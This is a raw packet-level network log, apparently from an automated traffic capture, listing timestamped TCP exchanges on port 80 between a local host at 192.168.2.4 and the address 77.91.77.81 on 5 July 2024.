                                                                Jul 5, 2024 04:23:06.833147049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833153963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833163977 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833170891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833178043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833188057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833199024 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833204031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833209991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833220959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833229065 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833245039 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833249092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833249092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833283901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833304882 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833319902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833343029 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833353043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833363056 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833364010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833384037 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833401918 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833468914 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833482981 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833498001 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833513021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833519936 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833528042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833544016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833544016 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833559990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833575010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833599091 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833620071 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833647013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833659887 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833662987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833678961 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833687067 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833697081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833702087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833713055 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833719969 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833729029 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833745003 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833755016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833761930 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833781958 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833796978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833811045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833827019 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833827019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833839893 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833843946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833856106 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833859921 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833869934 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833877087 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833889008 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833893061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833901882 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833913088 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833921909 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833931923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833935976 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833945990 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833950043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833965063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833975077 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833981037 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.833986998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.833997011 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834007978 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834012985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834022999 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834028006 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834036112 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834044933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834055901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834067106 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834084988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834194899 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834213972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834229946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834243059 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834247112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834259033 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834264994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834270000 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834281921 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834287882 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834305048 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834312916 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834321022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834330082 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834330082 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834336042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834351063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.834368944 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834389925 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.834398031 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865036964 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865066051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865081072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865139008 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865149975 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865159988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865164995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865180969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865194082 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865196943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865215063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865220070 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865242958 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865267992 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865276098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865289927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865303040 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865314007 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865319014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865334988 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865334988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865350008 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865353107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.865365982 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865375042 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.865391016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897531986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897556067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897572994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897595882 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897619963 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897628069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897644043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897659063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897674084 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897680998 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897699118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897705078 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897715092 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897732019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897732019 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897756100 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897764921 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897773027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897787094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897789955 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897804022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.897818089 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.897840023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922209024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922223091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922271013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922282934 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922317982 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922322035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922339916 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922368050 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922385931 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922394037 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922434092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922574043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922589064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922621012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922627926 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922636986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922652960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922662973 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922667980 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922684908 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922687054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922708035 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922724962 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922745943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922763109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922777891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922792912 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922797918 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922811985 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922823906 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922827959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922843933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922843933 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922858953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922872066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922874928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922890902 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922902107 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922924042 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.922975063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.922990084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923003912 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923018932 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923027039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923033953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923049927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923051119 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923065901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923082113 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923082113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923100948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923103094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923124075 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923145056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923190117 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923212051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923227072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923238993 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923243046 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923258066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923259974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923276901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923276901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923294067 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923295975 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923310995 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923314095 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923326969 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923341990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923346043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923356056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923357964 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923373938 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923382998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923396111 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923399925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923410892 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923417091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923432112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923440933 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923448086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923460007 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923470974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923476934 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923494101 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923511982 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923579931 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923595905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923609972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923624992 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923626900 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923639059 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923643112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923657894 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923660994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923669100 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923676968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923690081 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923691988 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923707962 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923708916 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923717976 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923726082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923734903 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923753023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923757076 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923763990 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923773050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923788071 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923804045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923806906 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923820019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923820972 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923841953 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923863888 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.923976898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.923993111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924009085 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924024105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924030066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924041033 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924045086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924065113 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924083948 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924175978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924190998 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924206972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924221992 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924226046 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924237013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924242973 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924253941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924267054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924271107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924287081 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924288034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924304008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924304962 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924316883 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924328089 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924335957 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924345016 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924355030 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924360037 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924372911 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924376965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924391985 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924391985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924401999 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924408913 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924422026 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924423933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924441099 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.924443960 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924453020 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924474001 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.924490929 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955301046 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955322027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955346107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955363035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955378056 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955394983 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955396891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955415010 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955431938 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955451012 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955475092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955488920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955504894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955528021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955533981 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955547094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955548048 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955573082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955574036 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955590010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955599070 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955615044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955616951 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955631018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955646038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.955647945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955666065 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955698013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.955698013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.987360001 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.987389088 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.987411976 CEST804973177.91.77.81192.168.2.4
